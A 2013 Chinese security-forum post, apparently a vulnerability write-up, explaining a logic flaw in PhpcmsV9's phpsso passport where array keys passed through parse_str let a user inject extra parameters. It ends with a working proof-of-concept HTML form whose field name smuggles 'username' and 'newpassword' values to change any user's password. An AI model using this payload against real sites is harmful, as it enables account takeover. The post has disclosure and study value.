找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发
返回列表 发新帖
查看: 2231|回复: 0
打印 上一主题 下一主题

PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-23 14:46:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
提到的通行证的代码:
. Y* b3 m8 e& W5 B1 r( i/ A' z( B( l- S+ z% Y+ P8 ?' c

, r& U: L8 o7 T7 Yparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);' N# |2 _* n5 Q0 t( x  j

# I0 q2 K4 x% _# j( [在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。3 W# D1 G# `5 X  ^% W

, J4 j$ ^% G) M+ Q4 D$ O我把它留给了你们。4 W2 k( G! [( v8 q/ m" _* a; a
不知道你们发现了它没有。
* a( R6 m+ I8 [9 u' B
: K0 J  ]# _  }9 t- L: R) q* y我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。2 w4 d  }2 X7 Z9 ?( E
* S! v4 Q4 N3 @3 F6 r
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
: D/ C4 p! b) \& _, k# G3 W: B* B' R/ Y! l& K. G
也就是
- t. X5 R$ h. p5 ?7 G
& k* u& ~& z) O* X0 k' V4 ?: Pusername=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。" s5 d+ M* O' q* ~$ S2 m* u% o  S
0 W2 D/ V; Q1 Q: k5 A3 |8 e
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
, p- q9 I3 B2 \$ f: y
# w/ t1 e9 u6 w$ w7 R, @* Y5 J' d& z, M
其实我们有这样的机会,看看代码,如下:$ Q! L* R9 J  K0 x% ?/ j/ q
8 b" O8 |( x! Y' Q9 A

# K7 Y. e. }5 V) Q& [' cpublic function auth_data($data) {
: R2 {" B! [3 a9 w# m, _: a) `/ _" i                $s = $sep = '';
' ^4 J, Y0 C1 j8 b" l5 N                foreach($data as $k => $v) {
# f9 M" s! i, J1 B                        if(is_array($v)) {; q9 |8 g# Y+ Q7 B5 [1 c( k
                                $s2 = $sep2 = '';
! s. Q, w- w' Q: I1 ~3 O3 c  x5 ?                                foreach($v as $k2 => $v2) {' O: U0 Q0 t4 a* G  L, Z( E
                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
: C7 G2 t' k& S8 `8 }4 x                                        $sep2 = '&';
. D- Y  d9 d" {4 l; _6 I                                }
, l! s; n: `  ?- D8 ], k# S* h                                $s .= $sep.$s2;
( q8 R* \9 }1 I( R                        } else {
! y  G( k, u( |* p7 m7 H0 |                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
4 O, v8 T, N  s. O% F                        }
8 {. t! b$ Q# E                        $sep = '&';3 s! z! N% C7 F4 P- z* D6 ^# H
                }& l' o+ o0 p& N" @# B

; v! [# q, Z3 P- Q7 m( f: f                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));9 G0 ?: I$ o) q) g' K! I% z
                return $auth_s;
- S9 Y/ E9 q' j& N0 u5 \; {        }8 E* w% n' a8 `. N' \
; J" L* L' v! p' o) K% |3 E( d" T
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。- ~; m) s2 X" W( [/ U

4 h& ~* H$ r' a2 B3 h% ]- N举个例子3 m9 q& Q. c$ i

! z/ C# n* O& Z+ z  Z+ [$a[aaa=a&bbb] = 'a';
3 m  d% n) q) C2 E8 e1 g" s# o9 D& @! u. W7 N, @; g4 \
会变成aaa=a&bbb=a
4 P$ i& [5 W% x; }. e# G
/ C9 ?3 g6 f) {3 A4 l明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。: k5 x- |. \$ e! m& O, v
  ~9 M% x1 n, E' ~0 A
这个时候,我们可以再去看一个函数。
# l/ _7 v0 R& _. F- E# g6 J9 `6 X5 J( [# z' B$ y  c- e( Q- {
就在这个文件内:
9 W! h9 i! @) W( t* r* v7 P+ c9 j' Y2 m& k" m0 E: y& Y
6 c4 W% j. L! X. ]- _4 w. f* ]
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
3 H6 W7 F8 a* u                if($email && !$this->_is_email($email)) {( i2 O0 Q* t* M/ Y; b
                        return -4;) U2 i# t/ r. [) E
                }
5 f/ }6 w" E8 ~, j                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));& B  ]* A8 A/ |- u5 |+ X
        }
& {% E9 D! _* H0 A9 `' s: X& y. P8 E) F0 k7 K
这是向通行证发了这样一个请求。! v+ U5 ]' m1 T  ]6 Z9 p  `* l
1 F4 K8 E1 l6 H
我们再跟到通信证代码里去看看,就会有所发现。
4 H$ ]4 x; D8 C' J' p( D4 N: L" q8 g! `, {6 z/ N7 ?/ J- D% \7 F( B5 V

  c! f( j$ c6 |6 [' b% epublic function edit() {
! Q/ y- m1 F9 U8 a7 w//能省就省,太长了不是吗?
1 u. e& V4 ?6 S, ~2 K) Q5 c
: @' k& s0 f% l- q  i9 Zif($this->username) {! K8 U- H3 o8 b. C6 ]
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。: E+ z& f) [& r3 F/ K1 N
                                $res = $this->db->update($data, array('username'=>$this->username));  c1 n# Z. u; W% C4 A" [
                        } else {" k7 t. U9 Y$ M# G0 f& ]7 r. D
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
2 ^. A* L2 F3 S% l3 i" d                                $res = $this->db->update($data, array('uid'=>$this->uid));3 S3 A2 v# J9 N
                        }
7 P# d; Q* D6 S: n# O( A  I
3 V+ s. W/ P9 {+ W! d: z好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
+ _# H0 V- _6 F' r1 R
& [  d: L. ?1 p% [9 k7 }3 o% N. j8 ]public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')' [0 ~" y8 m# o% q7 h$ j
# C8 {2 K( O7 e4 Y2 K; ?7 H
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。9 U: P8 M% o( u

4 g0 t4 I; K8 y/ s6 ~: P我当然找到了:0 q" w6 f. E3 n4 H: m4 t
phpcms9/phpcms/modules/member/index.php
2 V8 C* J& _: j6 I; i! T) T- D; B' n4 u  F
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);: J& F1 V% |# r1 _: i- A: s
* R4 n. D0 d$ h
然后就没有然后了。
7 ^9 W$ n$ R6 E, M' n8 R8 a* {6 A1 o8 G8 j: K
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
/ N% `# ~3 S# o: O# n                                <table width="100%" cellspacing="0" class="table_form">: t- |& w" N1 k. K5 A* B7 w3 v8 G" U) _
                                        <tr>
0 ~; p* x+ B( b  G, w: z1 X                                                <th width="80">邮箱:</th>        9 H; p6 a, r3 O4 s2 v3 @8 j
                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
& B  h8 l8 I- Z. M( ]) y' @6 h4 C6 P                                        </tr>: v( F* h  i% @) A! Y* e
                                        <tr>
/ |' l9 I! }5 X                                                <th width="80">原密码:</th>        
9 j: x. N3 `0 V* m                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
  E7 G( R6 e6 |$ I& U: N' H' E                                        </tr>, J* E/ m. Q& L% J% n2 h
                                        <tr># @: k- Q4 Q# r% |4 @
                                                <th>新密码:</th>
& t: @  x0 n8 Z0 J! `+ [/ ]                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>5 r" m( O* D8 _8 Z
                                        </tr>: I7 ?% t6 ^) K1 s
                                        <th></th>5 m, P5 Y+ n  n' N3 h
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
% G) H5 F* W- N' B9 z                                        </tr>" p% Y9 f. n4 I7 P. K5 d) s
                                </table>
; ~8 X4 S% ?0 ^0 m0 m
* t  x# _9 o! x                                  p( D" r$ j, G8 i. F% o) l$ O
                        </form>" v; g8 {" p* a2 ?% E" w) M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表